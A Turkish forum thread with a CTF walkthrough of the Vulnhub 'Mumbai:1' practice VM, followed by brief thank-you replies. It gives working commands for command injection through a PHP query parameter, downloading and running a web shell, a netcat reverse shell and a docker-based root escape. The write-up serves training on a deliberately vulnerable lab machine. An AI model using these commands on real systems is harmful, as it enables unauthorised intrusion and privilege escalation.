THT DUYURU

 
 
Capture The Flag Vulnerable VM Walkthrough & Capture The Flag (CTF) Writeup Yazabileceğiniz Bölüm

Seçenekler

Mumbai:1 Vulnhub Walkthrough Zafiyetli Makine Çözümü // Uchiha-Sasuke

Bugs Bunny - ait Kullanıcı Resmi (Avatar)
Senior Hunter
Üyelik tarihi:
07/2016
Nereden:
MSFVenom
Mesajlar:
1.477
Konular:
115
Teşekkür (Etti):
28
Teşekkür (Aldı):
710
Ticaret:
(0) %
10
2552
08-02-2020 02:26
#1
Mumbai:1 Vulnhub Walkthrough

Herkese merhaba TurkHackTeam üyeleri,

Ben Uchiha-Sasuke,

Bu konumda sizlere 'Mumbai:1 Vulnhub Walkthrough' Zafiyetli makine çözümünü anlatacağım.




Mumbai:1 Vulnhub Walkthrough





İsim: Mumbai:1 Vulnhub Walkthrough

Çıkış Tarihi: 18 Kasım 2019

Zorluk: Orta Düzey

Dosya Boyutu: 1.9 GB

Hedef: proof.txt

Seri: Mumbai





Hemen konuya geçelim,

İlk olarak zafiyetli makinemizin IP Adresini öğrenelim.





Komudumuz;

Kod:
netdiscover
Komudumuzu yazıp Enter'leyelim.





Karşımıza böyle bir ekran geldi.

'192.168.1.58' IP'ye sahip olan makine bizim sızacağımız makine.

Şimdi IP Adresine ufak bir nmap taraması yapalım.





Komudumuz;

Kod:
nmap -A -p- 192.168.1.58 (IP Adresiniz Değişik Olabilir.)
Enterleyelim.








Açık portları vs. bilgileri verdi.

21 FTP, 22 SSH , 80 HTTP , 3306 mysql , 8000 HTTP(nginx)

21 Portu açık. Yani FTP,

Anonim Girişe izinli.

Şimdi hemen ftp ile giriş yapmayı deniyelim.





Komudumuz;

Kod:
ftp 192.168.1.58 (IP Adresiniz Değişiklik Gösterebilir)
Ardından Enter'leyelim.





Bizden Name ve Password İstiyor.

Kod:
name: anonymous
password: 331
Sırasıyla bu bilgileri girelim.

Ve girişimiz sağlandı.

Bakalım içerde hangi dosyalar var.





Komudumuz;

Kod:
ls
İçerde Note adlı bir dosya olduğunu görüyoruz.

Hemen bunu alalım.





Komudumuz;

Kod:
get Note
Ve Note adlı dosyamız Desktop'a geldi.

Artık FTP'den çıkış yapabiliriz.





Komudumuz;

Kod:
bye
Çıkışımız sağlandı.

Şimdi deminden Desktop'a gelen dosyaya bakalım ne varmış içinde ?





Komudumuz;

Kod:
cat Note
Yazıp Enter'leyelim.





Resimde'de görüldüğü gibi 'HTTP Servers running to Dockers' yazıyor.

Şimdi tarayıcımızı açalım ve IP'ye bağlı siteye girelim.





Tarayıcının arama bölümüne;

Kod:
192.168.1.58 (IP Adresine Göre Değişiklik Olabilir)
Yazıp girdik. Karşımıza yukarıdaki gibi Coming Soon yazan bir ekran çıktı.

Şimdi birde siteye 8000 (HTTP Nginx)'i ekleyip girelim.





Tarayıcımıza;

Kod:
192.168.1.58:8000
Yazıp girdik, Beyaz bir arkaplanda API Coming Here Soon! yazısı bizi karşılıyor.

Ancak burdan hiçbir ipucu vs. bulamadık.

O yüzden siteye bi dirb saldırısı yapalım.





Komudumuz;

Kod:
dirb http://192.168.1.58 (IP Adresine Göre Değişiklik Gösterebilir)
Enter'leyelim.





Karşımıza bissürü sonuç çıktı, en önemli olarak wordpress ve drupal göze çarpıyor.

Şimdi ise belirli şeyleri arayalım.





Komudumuz;

Kod:
dirb http://192.168.1.58:8000 -X .php, .txt, .py (IP Adresi Değişiklik Gösterebilir)
Şimdi belirli uzantılı şeyleri arayalım.php, .txt , .py gibi.

Enter'leyelim.





Ararken test.php'yi ve keywords.py'yi buldu

Şimdi test.php'den faydalanalım





Komudumuz;

Kod:
curl http://192.168.1.58:8000/test.php (IP Adresi Değişiklik Gösterebilir)
Yazıp Enter'leyelim.





Gördüğünüz üzere bize bir link verdi. Bu şimdilik kalsın.

Biz keywords.py'ye dönelim.





Komudumuz;

Alıntı:
wget http://192.168.1.58:8000/keywords.py (IP Adresi Değişiklik Gösterebilir)
Komudumuzu Yazıp Enterliyoruz.

Ardından Desktop'a keywords.py adlı bir dosya indi.





Şimdi inen dosya üstünde tarama tarzı bir işlem gerçekleştirelim.

Komudumuz;

Kod:
python3 keywords.py --query http://192.168.1.58/wordpress (IP Adresi Değişiklik Gösterebilir)
Ve değişik bir sonuç verdi.

Şimdi test.php'ye geri dönelim.





Komudumuz;

Kod:
curl -d "query=http://192.168.1.58/wordpress" http://192.168.1.58:8000/test.php (IP Adresi Değişiklik Gösterebilir)
Ardından Enter'leyelim.





Deminki gibi değişik bir sonuç verdi.

Şimdi aynı işlemi wordpress;id için yapalım.





Komudumuz;

Kod:
curl -d "query=http://192.168.1.58/wordpress;id" http://192.168.1.58:8000/test.php (IP Adresi Değişiklik Gösterebilir)
Ardından Enter'leyelim.





Böyle bir sonuç verdi.

Son cümlede 3 apiuser ve 1 docker verdi.

Şimdi bir sonraki işleme doğru ilerleyelim.





Komudumuz;

Kod:
curl -d "query=http://192.168.1.58/wordpress;pwd;ls -la" http://192.168.1.58:8000/test.php (IP Adresi Değişiklik Gösterebilir)
Komudumuzu yazıp Enter'leyelim.





Gördüğünüz gibi test.php gibi barındırdıklarını bize gösterdi.

Şimdi Bir daha tarıyalım.





Komudumuz;

Kod:
curl -d "query=http://192.168.1.58/wordpress;wget http://192.168.1.58:8000/phpshell.php;ls -la" http://192.168.1.58:8000/test.php (IP Adresi Değişiklik Gösterebilir)
Enter'leyelim.





Çıktımızı verdi.

Şimdi son bir tarama daha





Komudumuz;

Kod:
curl -d "query=http://192.168.1.58/wordpress;php phpshell.php" http://192.168.1.58:8000/test.php (IP Adresi Değişiklik Gösterebilir)
Kodumuzu yazıp Enter'leyelim.

Şimdi sona doğru yaklaştık, komutlarımızı girmeye devam edelim

Kod:
nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash")'
id
pwd




Kod:
docker run -it -v /root:/mnt/ignite ubuntu
cd /mnt
cd ignite
ls




Ve gördüğünüz gibi proof.txt'ye ulaştık

İsteyenler cat proof.txt yazıp içine bakabilirler





Uchiha iyi günler diler...


---------------------
"Ölüm, insanın değişmez kaderidir; marifet unutulmamaktır.".

Xowly, P4RS, xMstfx, GZM16, RTFM, RootAdam, - Teşekkür etti.
xMstfx - ait Kullanıcı Resmi (Avatar)
Katılımcı Üye
Üyelik tarihi:
12/2018
Mesajlar:
423
Konular:
24
Teşekkür (Etti):
317
Teşekkür (Aldı):
235
Ticaret:
(0) %
08-02-2020 13:36
#2
Ellerine sağlık
---------------------
Düşman edinmek istiyorsan bir şeyi değiştirmeyi dene
- Teşekkür etti.
NOVA - ait Kullanıcı Resmi (Avatar)
Kıdemli Grafiker
Üyelik tarihi:
06/2016
Nereden:
UI
Yaş:
31
Mesajlar:
2.478
Konular:
397
Teşekkür (Etti):
1431
Teşekkür (Aldı):
2212
Ticaret:
(0) %
08-02-2020 13:37
#3
Güzel anlatım elinize sağlık.
---------------------
- Teşekkür etti.
P4RS - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2017
Nereden:
Ankara
Mesajlar:
5.139
Konular:
626
Teşekkür (Etti):
1779
Teşekkür (Aldı):
3708
Ticaret:
(0) %
08-02-2020 13:42
#4
Ellerine sağlık kardeşim, böyle makine çözümlerini bekliyorum
---------------------


𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗
- Teşekkür etti.
'Börteçine - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
02/2016
Nereden:
google
Mesajlar:
6.292
Konular:
1600
Teşekkür (Etti):
204
Teşekkür (Aldı):
1446
Ticaret:
(0) %
08-02-2020 13:48
#5
eline sağlık
---------------------
Adalet ölünce soytarılar kral olurmuş
- Teşekkür etti.
Xowly - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
06/2019
Nereden:
ғate
Mesajlar:
725
Konular:
72
Ticaret:
(0) %
08-02-2020 14:04
#6
Ellerine sağlık
- Teşekkür etti.
ratio - ait Kullanıcı Resmi (Avatar)
Kıdemli Üye
Üyelik tarihi:
07/2013
Nereden:
Turk
Mesajlar:
2.462
Konular:
106
Teşekkür (Etti):
247
Teşekkür (Aldı):
890
Ticaret:
(0) %
08-02-2020 14:04
#7
Eline sağlık, güzel anlatım.
---------------------
Copyright decrypted

The Golden Ratio is a special number found by dividing a line into two parts so that the longer part divided by smaller part is also equal to the whole length divided by the longer part.
- Teşekkür etti.
GZM16 - ait Kullanıcı Resmi (Avatar)
Katılımcı Üye
Üyelik tarihi:
05/2018
Nereden:
Uzman Çavuş
Mesajlar:
387
Konular:
3
Teşekkür (Etti):
248
Teşekkür (Aldı):
203
Ticaret:
(0) %
08-02-2020 14:04
#8
Elline sağlık
--------------------- Anılmakla hangi ruh olmaz ki sarhoş!
- Teşekkür etti.
xbaytar - ait Kullanıcı Resmi (Avatar)
Uzman Üye
Üyelik tarihi:
11/2019
Nereden:
Eskişehir
Mesajlar:
1.066
Konular:
33
Teşekkür (Etti):
275
Teşekkür (Aldı):
699
Ticaret:
(0) %
08-02-2020 14:27
#9
Eline emeğine sağlık ^^
---------------------
- Teşekkür etti.
'Creative - ait Kullanıcı Resmi (Avatar)
Kıdemli Üye
Üyelik tarihi:
03/2017
Mesajlar:
3.164
Konular:
95
Teşekkür (Etti):
211
Teşekkür (Aldı):
1333
Ticaret:
(0) %
08-02-2020 15:17
#10
Güzel konu ve anlatım ,tebrikler.
---------------------
‘’ Hevesli üye yazdığına bakmayın hevesli değilim. Tşk.
- Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler